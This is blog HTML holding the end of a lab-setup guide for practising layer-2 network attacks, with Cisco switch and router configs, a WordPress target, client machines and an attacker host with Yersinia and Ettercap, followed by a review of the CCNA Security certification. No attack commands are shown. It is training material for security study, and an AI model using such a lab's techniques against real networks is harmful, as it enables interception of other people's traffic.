<span class="k">interface</span><span class="s"> fastEthernet 1/0</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</td></tr></table></div>
</li>
<li>
<p><span class="lb-small floatright"><a href="#esw5.png" id="esw5.png-thumb" title="Click to enlarge"><img alt="ESW5 ethernet swtich" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw5.png"/></a></span>
<span class="caps">ESW5</span> configuration (router-based version):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre> 1
2
3
4
5
6
7
8
9
10</pre></div></td><td class="code"><div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">vtp</span> mode client
<span class="k">interface</span> range<span class="s"> fastEthernet 1/1 - 15</span>
<span class="k">switchport</span> access vlan <span class="s">3</span>
<span class="nb">exit</span>
<span class="k">interface</span><span class="s"> fastEthernet 1/0</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</td></tr></table></div>
</li>
</ul>
<h4 id="r1-main-router"><a class="toclink" href="#r1-main-router"><em>R1</em>: main router</a></h4>
<p>The main router provides the following services:</p>
<ul>
<li>Inter-<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> routing.</li>
<li><span class="caps">DHCP</span> server for the VLANs 1 and 2 (the clients are given an address
belonging to the [*.100-*.199] range).</li>
<li>Firewall blocking any direct communication between <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 1 and <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 2.</li>
</ul>
<p><span class="lb-small floatright"><a href="#r1.png" id="r1.png-thumb" title="Click to enlarge"><img alt="R1 router" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/r1.png"/></a></span>
R1 configuration:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61</pre></div></td><td class="code"><div class="codehilite"><pre><span class="k">conf</span> t
<span class="c1">! Firewall configuration</span>
<span class="k">class-map </span>type inspect match-any <span class="nv">ALL</span>
<span class="k">match</span> protocol tcp
<span class="k">match</span> protocol udp
<span class="k">match</span> protocol icmp
<span class="nb">exit</span>
<span class="k">policy-map </span>type inspect <span class="nv">INSPECT_ALL</span>
<span class="k">class </span>type inspect <span class="nv">ALL</span>
<span class="k">inspect</span>
<span class="nb">exit</span>
<span class="nb">exit</span>
<span class="k">zone </span>security <span class="nv">USERS</span>
<span class="nb">exit</span>
<span class="k">zone </span>security <span class="nv">ADMINS</span>
<span class="nb">exit</span>
<span class="k">zone </span>security <span class="nv">SERVERS</span>
<span class="nb">exit</span>
<span class="k">zone-pair </span>security <span class="nv">USERS-SERVERS </span>source <span class="nv">USERS </span>destination <span class="nv">SERVERS</span>
<span class="k">service-policy </span>type inspect <span class="nv">INSPECT_ALL</span>
<span class="nb">exit</span>
<span class="k">zone-pair </span>security <span class="nv">ADMINS-SERVERS </span>source <span class="nv">ADMINS </span>destination <span class="nv">SERVERS</span>
<span class="k">service-policy </span>type inspect <span class="nv">INSPECT_ALL</span>
<span class="nb">exit</span>
<span class="c1">! Interfaces configuration:</span>
<span class="k">interface</span><span class="s"> fastEthernet 0/0</span>
<span class="ow">no </span><span class="k">shutdown</span>
<span class="nb">exit</span>
<span class="k">interface</span><span class="s"> fastEthernet 0/0.1</span>
<span class="k">zone-member </span>security <span class="nv">USERS</span>
<span class="k">encapsulation</span> dot1Q <span class="s">1</span>
<span class="k">ip</span> address <span class="s">192.168.1.1</span> <span class="s">255.255.255.0</span>
<span class="nb">exit</span>
<span class="k">interface</span><span class="s"> fastEthernet 0/0.2</span>
<span class="k">zone-member </span>security <span class="nv">ADMINS</span>
<span class="k">encapsulation</span> dot1Q <span class="s">2</span>
<span class="k">ip</span> address <span class="s">192.168.2.1</span> <span class="s">255.255.255.0</span>
<span class="nb">exit</span>
<span class="k">interface</span><span class="s"> fastEthernet 0/0.3</span>
<span class="k">zone-member </span>security <span class="nv">SERVERS</span>
<span class="k">encapsulation</span> dot1Q <span class="s">3</span>
<span class="k">ip</span> address <span class="s">192.168.3.1</span> <span class="s">255.255.255.0</span>
<span class="nb">exit</span>
<span class="c1">! DHCP server configuration:</span>
<span class="k">ip</span> dhcp excluded-address <span class="s">192.168.1.0</span> <span class="s">192.168.1.99</span>
<span class="k">ip</span> dhcp excluded-address <span class="s">192.168.1.200</span> <span class="s">192.168.1.255</span>
<span class="k">ip </span>dhcp pool <span class="nv">VLAN1</span>
<span class="k">network</span> <span class="s">192.168.1.0</span> <span class="s">255.255.255.0</span>
<span class="k">default-router</span> <span class="s">192.168.1.1</span>
<span class="c1">! Normally you would also set the DNS server here.</span>
<span class="nb">exit</span>
<span class="k">ip</span> dhcp excluded-address <span class="s">192.168.2.0</span> <span class="s">192.168.2.99</span>
<span class="k">ip</span> dhcp excluded-address <span class="s">192.168.2.200</span> <span class="s">192.168.2.255</span>
<span class="k">ip </span>dhcp pool <span class="nv">VLAN2</span>
<span class="k">network</span> <span class="s">192.168.2.0</span> <span class="s">255.255.255.0</span>
<span class="k">default-router</span> <span class="s">192.168.2.1</span>
<span class="nb">exit</span>
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</td></tr></table></div>
<h4 id="server_1-a-shared-web-server"><a class="toclink" href="#server_1-a-shared-web-server"><em>Server_1</em>: a shared web server</a></h4>
<p><span class="lb-small floatright"><a href="#server-1.png" id="server-1.png-thumb" title="Click to enlarge"><img alt="server_1 server" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/server-1.png"/></a></span>
On my side I will use <a href="https://bitnami.com/stack/wordpress" rel="external" title="Bitnami WordPress Stack (Bitnami)">Bitnami Wordpress</a> image to act as the server.
Feel free to use anything you like, as long as there is some data to intercept.</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32</pre></div></td><td class="code"><div class="codehilite"><pre><span class="c"># If you need to change the keyboard layout (French layout here):</span>
sudo loadkeys fr
<span class="c"># To get a root shell (ONLY FOR LAB PURPOSES!)</span>
sudo -s
ifconfig eth0 192.168.3.100
<span class="c"># Avoid bug (?) from IOU by reducing the MTU to leave enough room</span>
<span class="c"># for the 802.1q VLAN tag (4 bytes), otherwise IOU drops large</span>
<span class="c"># packets outgoing the trunk interface with the error:</span>
<span class="c"># "LINK-4-TOOBIG: Interface Ethernet0/0, Output packet size of 1518 bytes too big"</span>
ifconfig eth0 mtu 1496
route add default gw 192.168.3.1
vi /etc/network/interfaces
<span class="c"># [...skipped...]</span>
auto eth0
iface eth0 inet static
address 192.168.3.100/24
gateway 192.168.3.1
mtu 1496
<span class="c"># [...skipped...]</span>
vi /etc/hosts
127.0.0.1 localhost
192.168.3.100 bitnami
<span class="c"># Force Apache to listen on the IPv4 interface instead of IPv6 ones</span>
vi /opt/bitnami/apache2/conf/httpd.conf
<span class="c"># [...skipped...]</span>
<span class="c"># Listen 80</span>
Listen 0.0.0.0:80
<span class="c"># [...skipped...]</span>
<span class="c"># To restart the services:</span>
service bitnami restart
</pre></div>
</td></tr></table></div>
<h4 id="user_1-admin_1-clients"><a class="toclink" href="#user_1-admin_1-clients"><em>User_1</em>, <em>Admin_1</em>: clients</a></h4>
<p><span class="lb-small floatright"><a href="#user-1_admin-1.png" id="user-1_admin-1.png-thumb" title="Click to enlarge"><img alt="user_1 and admin_1 workstations" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/user-1_admin-1.png"/></a></span>
For them on my side I will use <span class="caps">GNS3</span>’s <a href="https://gns3.com/marketplace/appliance/firefox-guest" rel="external" title="Firefox guest (GNS3 Marketplace)">Firefox appliance</a>.
It is a super-light graphical Linux with Firefox.</p>
<ul>
<li>When creating the end-device template, don’t forget to edit the Qemu
options: <code>-vga std -usbdevice tablet -k fr</code>.</li>
<li>You have an icon in the dock to set the keyboard layout on the first boot.</li>
</ul>
<p>Ensure that <em>User_1</em> and <em>Admin_1</em> can both open <em>http://192.168.3.100</em> in
their browser:</p>
<p><span class="lb-small"><a href="#client.jpg" id="client.jpg-thumb" title="Click to enlarge"><img alt="Client accessing the server's homepage" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/client.jpg"/></a></span></p>
<h4 id="attacker-the-source-of-all-evil"><a class="toclink" href="#attacker-the-source-of-all-evil"><em>Attacker</em>: the source of all evil</a></h4>
<p><span class="lb-small floatright"><a href="#attacker.png" id="attacker.png-thumb" title="Click to enlarge"><img alt="attacker workstations" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/attacker.png"/></a></span>
I will use <a href="https://backbox.org/" rel="external" title="BackBox project homepage">BackBox</a> Linux.
If you are more comfortable with another distribution, feel free to use it
instead.
We will mostly work with <a href="http://www.yersinia.net/" rel="external" title="Yersinia project homepage">Yersinia</a> and <a href="https://ettercap.github.io/ettercap/" rel="external" title="Ettercap project homepage">Ettercap</a>, ensure you have them
available on your system.</p>
<p><em>Attacker</em> can ping <em>User_1</em> but cannot ping <em>Admin_1</em>:</p>
<div class="codehilite"><pre><span class="gp">backbox@backbox:~$</span> ping -c <span class="m">1</span> 192.168.1.100
<span class="go">PING 192.168.1.100 (192.168.1.100) 56(84) bytes of data.</span>
<span class="go">64 bytes from 192.168.1.100: icmp_seq=1 ttl=64 time=0.919 ms</span>
<span class="go">--- 192.168.1.100 ping statistics ---</span>
<span class="go">1 packets trasmitted, 1 received, 0% packet loss, time 0 ms</span>
<span class="go">rtt min/avg/max/mdev = 0.919/0.919/0.919/0.OOO ms</span>
<span class="gp">backbox@backbox:~$</span> ping -c <span class="m">1</span> 192.168.2.100
<span class="go">PING 192.168.2.100 (192.168.2.100) 56(84) bytes of data.</span>
<span class="go">--- 192.168.2.100 ping statistics ---</span>
<span class="go">1 packets trasmitted, 0 received, 100% packet loss, time 0 ms</span>
<span class="gp">backbox@backbox:~$</span>
</pre></div>
<p>He also has access to <em>Server_1</em>.</p>Cisco CCNA Security certification review2017-09-01T00:00:00+02:002017-09-01T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-09-01:/posts/2017/09/01/cisco-ccna-security-certification-review/<h3>The five Ws</h3>
<ul>
<li>
<p><strong>What</strong>:
<span class="caps">CCNA</span> Security is a technical certification about general network security
in a professional context.
It describes the typical threats potentially affecting such networks then
various Cisco technologies allowing to mitigate them.
This covers the networking devices themselves, but also the data both in
transit and at rest and end-user devices both corporate ones and personal
one (<abbr title="Bring Your Own Device"><span class="caps">BYOD</span></abbr>).</p>
</li>
<li>
<p><strong>When</strong>:
Obtaining this certification requires to have at least the <span class="caps">CCENT</span>
certification (I recommend having a <a href="/posts/2017/08/21/ccna-routing-switching-certification-review/" title="CCNA Routing & Switching certification review"><span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching</a>, though).</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>While the <span class="caps">CCENT</span> or <span class="caps">CCNA</span> R&S is a prerequisite to be granted the
<span class="caps">CCNA</span> Security certification, they are not technically required to take
the exam.</p>
<p>If for some reasons it suits you, Cisco allows you to take the <span class="caps">CCNA</span>
Security exam before having obtained a <span class="caps">CCENT</span> or <span class="caps">CCNA</span> R&S.
If you pass the exam, you will be granted the <span class="caps">CCNA</span> Security
certification once you get your …</p></div></li></ul><h3 id="the-five-ws"><a class="toclink" href="#the-five-ws">The five Ws</a></h3>
<ul>
<li>
<p><strong>What</strong>:
<span class="caps">CCNA</span> Security is a technical certification about general network security
in a professional context.
It describes the typical threats potentially affecting such networks then
various Cisco technologies allowing to mitigate them.
This covers the networking devices themselves, but also the data both in
transit and at rest and end-user devices both corporate ones and personal
one (<abbr title="Bring Your Own Device"><span class="caps">BYOD</span></abbr>).</p>
</li>
<li>
<p><strong>When</strong>:
Obtaining this certification requires to have at least the <span class="caps">CCENT</span>
certification (I recommend having a <a href="/posts/2017/08/21/ccna-routing-switching-certification-review/" title="CCNA Routing & Switching certification review"><span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching</a>, though).</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>While the <span class="caps">CCENT</span> or <span class="caps">CCNA</span> R&S is a prerequisite to be granted the
<span class="caps">CCNA</span> Security certification, they are not technically required to take
the exam.</p>
<p>If for some reasons it suits you, Cisco allows you to take the <span class="caps">CCNA</span>
Security exam before having obtained a <span class="caps">CCENT</span> or <span class="caps">CCNA</span> R&S.
If you pass the exam, you will be granted the <span class="caps">CCNA</span> Security
certification once you get your <span class="caps">CCENT</span> or <span class="caps">CCNA</span> R&S.</p>
<p>Depending on your schedule, this might be something worth to know.</p>
</div>
</li>
<li>
<p><strong>Why</strong>:
This certification demonstrates fundamental knowledge on threats affecting
corporate data networks and familiarity with Cisco technologies designed to
mitigate them.</p>
<p>For <span class="caps">US</span> people, this certification also officially meets the
<a href="https://www.cisco.com/c/en/us/training-events/training-certifications/certifications/associate/ccna-security/cnss-4011-recognition.html" rel="external" title="CCNA Security: CNSS 4011 Recognition (Cisco)"><span class="caps">NSA</span> / <span class="caps">CNSS</span> 4011</a> training standard and is <a href="https://www.cisco.com/c/en/us/training-events/training-certifications/certifications/associate/ccna-security/dod-8570.html" rel="external" title="CCNA Security: DoD 8570 Recognition (Cisco)">DoD 8570</a>
compliant, approved for the <span class="caps">IAT</span> Level <span class="caps">II</span>.
This may satisfy some of requirements to be hired either directly by <span class="caps">US</span>
governmental entities or by consulting companies providing services to them.</p>
</li>
<li>
<p><strong>Who</strong>:
If you are interested in networking and in security, this certification
is an obvious choice.
Cisco technologies are widespread, this certification provides the
opportunity to dig further areas which are only scratched by the <span class="caps">CCNA</span> R&S
and familiarize yourself with various technologies like Cisco’s <span class="caps">VPN</span>
and firewall technologies.</p>
</li>
<li>
<p><strong>Where</strong>:
You only need to pass one exam to get this certification.
It can be taken in any Pearson <span class="caps">VUE</span> test center.</p>
<p>This is a classical Cisco exam, it presents itself in a similar fashion
as the <span class="caps">CCENT</span> and <span class="caps">CCNA</span> R&S exams: MCQs and lab simulation (the lab being
of course extended to cover products specific to the <span class="caps">CCNA</span> Security curriculum).</p>
</li>
</ul>
<h3 id="training-material"><a class="toclink" href="#training-material">Training material</a></h3>
<h4 id="building-a-lab"><a class="toclink" href="#building-a-lab">Building a lab</a></h4>
<p>Let’s say it straight: devices and services deployment is out-of-scope for this
exam.
Cisco training material assumes that you are provided, either by your training
center or by your company, access to read-to-use environments to do your
practical training.</p>
<p>When working on the <span class="caps">CCNA</span> R&S, there is enough documentation sources available
to know what you will need, and once you have your lab ready you can fully
dedicate yourself to the training step.</p>
<p>Here, chances are that your studies will frequently be brutally interrupted for
an unknown amount of time because the author suddenly adds a new service like
<em>“Configure you <span class="caps">CCP</span> as in the following screenshot”</em>, leaving you with a lot of
unanswered questions:</p>
<ul>
<li>What is a “<span class="caps">CCP</span>”?</li>
<li>Do I really need a practical knowledge of this or is it enough to just
learn it from theoretical point-of-view from the book?</li>
<li>Where can I get it? Is it freely available?</li>
<li>Does the <span class="caps">CCNA</span> Security expects a specific version of the software?</li>
<li>How to install it, what are the prerequisites and installation process?</li>
<li>Why doesn’t it work? Is it because of a bug, an incompatibility, a wrong
setting in the emulator or in the operating system or a license issue?</li>
<li>Several hours of debugging and Internet searches later, why it still
doesn’t work?</li>
<li>How do I manage it? How do I make it interoperate with the rest of the
topology, how do I create an account for myself?</li>
</ul>
<p>And once you went through this, you can go back to your study… until the next
component is added.</p>
<p>From my personal experience, in addition to <span class="caps">CCNA</span> R&S components you also need
a practical training on <a href="/posts/2017/08/28/how-to-install-cisco-adaptative-security-appliance-asa-in-gns3/" title="How to install Cisco Adaptative Security Appliance (ASA) in GNS3"><span class="caps">ASA</span> and <span class="caps">ASDM</span></a>, <a href="/posts/2017/08/28/how-to-install-cisco-secure-access-control-system-acs-server-in-gns3/" title="How to install Cisco Secure Access Control System (ACS) server in GNS3"><span class="caps">ACS</span></a>, <a href="/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/" title="How to install Cisco Configuration Professional (CCP) in GNS3"><span class="caps">CCP</span></a> and <a href="/posts/2017/10/05/how-to-configure-windows-as-a-scep-server-cisco-asa-enrollment/" title="How to configure Windows as a SCEP server & Cisco ASA enrollment"><span class="caps">SCEP</span></a>.
Some other technologies are covered by the curriculum such as end-devices
security technologies but having an general knowledge on what they are and
how they work from high-level perspective is usually enough (for now, that was
true for me but keep in mind that the <span class="caps">CCNA</span> Security curriculum may evolve).</p>
<p>I’m currently completing the <a href="https://www.whitewinterwolf.com/tags/virtualization/" rel="tag" title="View articles tagged 'virtualization'">virtualization</a> section of
this site to cover the installation of required components in your lab.
Moreover, you will also find unvaluable information in <a href="https://www.youtube.com/watch?v=VgoFXwb1QvI" rel="external" title="Building a Cisco CCNA Security Virtual Lab (YouTube)">this video</a> by
Keith Barker.</p>
<h4 id="learning-resources"><a class="toclink" href="#learning-resources">Learning resources</a></h4>
<p>The <span class="caps">CCNA</span> Security is not a widespread certification compared to the <span class="caps">CCNA</span> R&S
for instance.
The main consequence of this is a very low amount of documentation available.</p>
<p>If you’ve read my <a href="/posts/2017/08/21/ccna-routing-switching-certification-review/" title="CCNA Routing & Switching certification review"><span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching review</a>, you should have
read how satisfied I was of the <a href="https://www.subnetting.net" rel="external" title="Subnetting.net homepage">subnetting.net</a> website.
While I was studying for my <span class="caps">CCNA</span> Security, they were in the process of building
their <span class="caps">CCNA</span> Security course and it was not yet available.
By now their <span class="caps">CCNA</span> Security training material became available.
I did not view it, so I cannot tell whether it is good or not, but given the
quality of their <span class="caps">CCNA</span> R&S material I highly recommend you to at least check them.</p>
<p>Other than that, your have Cisco’s official book and… not much else.
I guess that the <span class="caps">CCNA</span> security cursus attract to few people and changes too
often to interest editors (note though that while writing this article, I see
that Sybex announces <a href="https://www.amazon.com/CCNA-Security-Study-Guide-210-260/dp/1119409934?tag=electronicfro-20" rel="external" title="CCNA Security Study Guide: Exam 210-260 (Amazon)">a book</a> for January 2018, yet again I cannot vouch
for its content).</p>
<p><span class="lb-small floatright"><a href="#cisco_guide.jpg" id="cisco_guide.jpg-thumb" title="Click to enlarge"><img alt="Cover of the Cisco CCNA Security official cert guide" src="https://www.whitewinterwolf.com/posts/2017/09/01/cisco-ccna-security-certification-review/cisco_guide.jpg"/></a></span>
Cisco’s <a href="https://www.amazon.com/CCNA-Security-210-260-Official-Guide/dp/1587205661?tag=electronicfro-20" rel="external" title="CCNA Security 210-260 Official Cert Guide (Amazon)">official certification guide</a> is of poor quality.
For its defense, it is well written and what is explained is explained clearly,
but I have the strong feeling that by it has been rushed and delivered in an
unfinished state.
The final product is therefore an incomplete book with missing parts (including
sections announced in the table of content) and with some chapters are mixed up.</p>
<p>To give a first example there is no introduction to the <span class="caps">CCP</span> tool, except to
tell you that you need to know it (not even any mention of which version and
flavor is concerned, both the book and Cisco’s curriculum remain vague on this).
It is mentioned for first time on page 41 and the author directly throws
screenshot at you. From where, how, what: you don’t know.
And as it happens, setting-up a working <span class="caps">CCP</span> is not an easy matter without
prior knowledge of its specificities.</p>
<p>The best case of mixed-up chapters is the chapter <em>5</em> about <span class="caps">PKI</span>
infrastructures which assumes that you have already read the chapter <em>8</em> which
introduces <span class="caps">ASA</span> to the reader:</p>
<blockquote>
<p>What I want to do now is walk you through an example of applying these
concepts to some devices you are already familiar with if you have read the
previous portions of this book.
Both the <em>Adaptative Security Appliance (<span class="caps">ASA</span>)</em> and Cisco routers can use
digital certificates.
Let’s take a look at installing digital certificates on the <span class="caps">ASA</span>, using the
<em>Adaptative Security Device Manager (<span class="caps">ASDM</span>)</em>.</p>
</blockquote>
<p>This is page 107 of the book, and is your first contact with these tools your
are anything but <em>“familiar”</em> with.
What the frustrated reader may not know is that this book indeed contains
an introduction to the <span class="caps">ASA</span> device, but it is buried a hundred pages later, in
the chapter 8 about <em>Implementing <span class="caps">SSL</span> VPNs using Cisco <span class="caps">ASA</span></em>.
The reader may assume this the same thing as with <span class="caps">CCP</span> and he is just
supposed to learn how to deploy and administrate <span class="caps">ASA</span> systems on-the-fly before
continuing to read.</p>
<p>But chapters are not only mixed-up and the <span class="caps">CCP</span> presentation is not the only
thing missing.
This book is incomplete as per the exam requirement.
If it is your only source of study, you <em>will</em> fail<sup id="fnref-failure"><a class="footnote-ref" href="#fn-failure">2</a></sup>.</p>
<p>Here are the missing parts from this book with a link to the material I used
to complement my learning:</p>
<ul>
<li>
<p>802.1X: The table presented in the introduction chapters show that it was
intended to be covered in the fourth chapter, but the whole section is
missing from the book.
Read Cisco’s <a href="https://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Security/TrustSec_1-99/Dot1X_Deployment/Dot1x_Dep_Guide.html?referring_site=RE&pos=2&page=http://www.cisco.com/c/en/us/td/docs/ios/12_4t/12_4t11/ht_8021x.html" rel="external" title="Wired 802.1X Deployment Guide (Cisco)">Wired 802.1X Deployment Guide</a>.</p>
</li>
<li>
<p><span class="caps">ACS</span> authentication protocols (<span class="caps">PAP</span>, <span class="caps">CHAP</span> and <span class="caps">EAP</span>-based ones) are extensively
tested during the exam but not even mentioned in the book.
Read the relevant chapter in the
<a href="https://www.cisco.com/c/en/us/td/docs/net_mgmt/cisco_secure_access_control_system/5-6/user/guide/acsuserguide/eap_pap_phase.html" rel="external" title="Authentication in ACS (Cisco)"><span class="caps">ACS</span> online documentation</a><sup id="fnref-acs-version"><a class="footnote-ref" href="#fn-acs-version">1</a></sup>.</p>
</li>
<li>
<p><span class="caps">PVLAN</span> was meant to be covered in chapter 9 according to the tables in the
beginning of the book, but it was forgotten.
See <a href="https://www.youtube.com/watch?v=tbG9YboATvA" rel="external" title="Private VLAN tutorial and demonstration (YouTube)">this video</a> by Keith Barker.</p>
</li>
<li>
<p>Reflexive Access Lists are also never mentioned in the book while tested
in the exam.
They are not a complicated topic, but not so easy that you can just assume
that everybody already knows that.
Check this <a href="https://www.youtube.com/watch?v=ZptZy0EgUnI" rel="external" title="Reflexive Access Lists">short video</a> also by Keith Barker.</p>
</li>
<li>
<p>Extranet VPNs: usually they are considered as a kind of <span class="caps">DMZ</span>, but in Cisco’s
world extranet VPNs provide a direct access to a company internal network.
This is the “historical occasional definition” stated in
<a href="https://en.wikipedia.org/wiki/Extranet" rel="external" title="Extranet (Wikipedia)">Wikipedia</a> and also explained in
<a href="http://www.ciscopress.com/articles/article.asp?p=24833" rel="external" title="Overview of VPNs and VPN Technologies (Cisco)">Cisco documentation</a>.
This is often asked under one form or another, it is not complicated,
but if you come to the exam with the common definition of extranets you
will fail.</p>
</li>
<li>
<p>Firewalls are covered in this book, that’s fortunate, but they are covered
incompletely as per the exam requirements:</p>
<ul>
<li>
<p>You are expected to know the limitations potentially affecting
multicast handling:</p>
<ul>
<li>Zone-based firewalls: filtering of multicast traffic is
<a href="https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_data_zbf/configuration/xe-3s/sec-data-zbf-xe-book/sec-zone-pol-fw.html" rel="external" title="Zone-Based Policy Firewalls (Cisco)">not supported</a> (search for “multicast” in the linked
page).
Control Plane Policing is the only way to go in this case.</li>
<li><span class="caps">ASA</span> firewalls: filtering of multicast traffic is
<a href="https://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/115804-asa-multi-probs-00.html" rel="external" title="ASA Multicast Troubleshooting and Common Problems (Cisco)">supported</a> (this link serves only as a reference to
show it is supported, you are not expected to know the details).</li>
</ul>
</li>
<li>
<p>You are expected to be familiar with <span class="caps">ASA</span> Security Contexts, know what
they are and why they are used.
Read this <a href="http://www.ciscopress.com/articles/article.asp?p=426641" rel="external" title="Cisco ASA Security Contexts (Cisco)">Cisco documentation</a>.</p>
</li>
<li>
<p>You must also be familiar with Cisco <span class="caps">ASA</span> Accelerated Security Path
(<span class="caps">ASP</span>).
Sadly, the blog I used as resource is now closed, so you’re on your
own for this one but there are many resources available online.</p>
</li>
</ul>
</li>
</ul>
<p>Maybe you noticed that I was often referring to Keth Barker’s videos.
He is a presenter for <span class="caps">CBT</span>-Nuggets videos.
The videos I linked here were free samples, but you can find the complete
set on <a href="https://www.cbtnuggets.com/it-training/cisco-ccna-security-210-260" rel="external" title="Cisco CCNA Security 210-260 IINS (CBT Nuggets)"><span class="caps">CBT</span> Nuggets website</a>.
You can use them to complete your knowledge, moreover new members benefits
from a free 7 days trial period so it may even not cost you any money.</p>
<h3 id="personal-impressions"><a class="toclink" href="#personal-impressions">Personal impressions</a></h3>
<h4 id="curriculum"><a class="toclink" href="#curriculum">Curriculum</a></h4>
<p>The curriculum associated to this exam matches the goal expressed at the
beginning of this post, as it allows someone starting in the realm of network
security and / or starting with Cisco’s network security technologies to
effectively deepen his knowledge on the subject.</p>
<p>However, personally I have two reservations:</p>
<ul>
<li>The topic list provided by Cisco is too vague.</li>
<li>It focuses too much on Cisco products usage at the expense of more
general background knowledge.</li>
</ul>
<p>Let’s see each of these reservations more in details.</p>
<h5 id="the-topics-list-is-too-vague"><a class="toclink" href="#the-topics-list-is-too-vague">The topics list is too vague</a></h5>
<p>First, both Cisco’s <a href="https://learningnetwork.cisco.com/community/certifications/security_ccna/iins-v3/exam-topics" rel="external" title="IINS Exam Topics (Cisco)">topics list</a> and official cert guide are really
too vague about what is actually expected from the student.</p>
<p>Yes, the topic list has Cisco’s usual disclaimer:</p>
<blockquote>
<p>The following topics are general guidelines for the content likely to be
included on the exam.
However, other related topics may also appear on any specific delivery of
the exam.
In order to better reflect the contents of the exam and for clarity
purposes, the guidelines below may change at any time without notice.</p>
</blockquote>
<p>This was also the case for the <a href="/posts/2017/08/21/ccna-routing-switching-certification-review/" title="CCNA Routing & Switching certification review"><span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching</a> exam,
but while in the later this disclaimer actually covered a few secondary
questions about knowledge that one is expected to gain during any normal
training and wouldn’t prevent a candidate from passing, here Cisco really seem
to go free-style regarding the choice of tested topics.</p>
<p>As this is a common claim regarding this certification, I remember a <span class="caps">CCIE</span>
on a forum who explained that this is a good thing because the more your
learn, the more you know, and one should not study with the exam as a goal,
giving as example the <span class="caps">CCIE</span> curriculum where the topics are voluntary very vague.</p>
<p>I do not agree at all with such statements.
The <span class="caps">CCNA</span> is an entry-level certification and the <span class="caps">CCIE</span> is an expert-level
one, you cannot compare them as they are two different beasts.</p>
<p>In entry-level certifications, the student needs to know precisely what
he has to study so he does not loose precious time on off-topic subjects
while missing important on-topic subjects (time is always playing against
any student).
Of course, given an infinite amount of time, the student could become an
expert in every topic before passing the <span class="caps">CCNA</span> exam, but this is not what
is expected: there is an upper-bound in each topic which must be clearly
indicated.
The student remains free to investigate over this upper-bound if time
allows him such additional research, and this may also provide insightful
background information about on-topic subjects, but this remain
<em>additional</em> research.</p>
<p>In expert-level certifications, there is basically no upper-bound anymore:
you are meant to be an expert on the listed topics.
For the domains where you are only required to be familiar with the “common
features” of something, your position should allow you to determine what
features are “commonly” found in the industry, which a candidate for an
entry-level certification is most likely unable to do.
For the domains where you are required to have a thorough knowledge, there
is effectively no upper-bound and you could be asked about any aspect of
the subject.
Of course you are not expected to know everything, which means you won’t
reach 100% score as you may potentially do in a lower-level exam, but the
gaps in you knowledge should be small enough to allow you to stay over the
required score.</p>
<p>Without a proper topic list or, at least, a proper certification guide, it is
just impossible for a self-learner to pass this exam.
That’s why you may have to check online either for specially created
training questions or for old exams (by the way the <span class="caps">IINS</span> exam currently labeled
210-260 was previously labeled 640-554, this may help you find older material
which, while not up-to-date, may still help you more accurately
determine what is expected from the student as the main topics remained the same).</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Don’t fall in the trap of learning the questions and answers and hoping to
pass only with that knowledge.</p>
<p>This is stupid (see my <a href="/posts/2017/08/17/are-certifications-useful-a-few-words-about-career-plans/" title="Are certifications useful? A few words about career plans.">general post</a> on certifications) and
most likely useless as Cisco regularly generates new batch of questions
with either new questions or, more subtly, the same question but with
a slight variation (a change in host names, numbers, etc.) making the
correct answer change in an otherwise similar-looking question.</p>
<p>As I said in the <a href="/posts/2017/08/17/are-certifications-useful-a-few-words-about-career-plans/" title="Are certifications useful? A few words about career plans.">general post</a>, don’t forget that you study
for yourself, to develop your own aptitudes in domains you are supposed to
like and be good at.</p>
</div>
<h5 id="curriculum-too-focused-on-cisco-product-usage"><a class="toclink" href="#curriculum-too-focused-on-cisco-product-usage">Curriculum too focused on Cisco product usage</a></h5>
<p>The <span class="caps">CCNA</span> R&S curriculum is <span class="caps">IMHO</span> a perfect example of curriculum where the
theoretical and practical content are well weighted.
In the <span class="caps">CCNA</span> R&S, you begin by learning for instance a protocol: why it is
needed, how it works, and then finally you learn how to implement it using
Cisco technologies.</p>
<p>The <span class="caps">CCNA</span> Security curriculum, on the other hand, focuses more heavily on Cisco
products.
I’m not saying that there is no theoretical knowledge at all, on the contrary
the details of IPsec for instance and its comparison with <span class="caps">SSL</span>-based VPNs are
very well developed and very interesting, and I suppose that someone new in
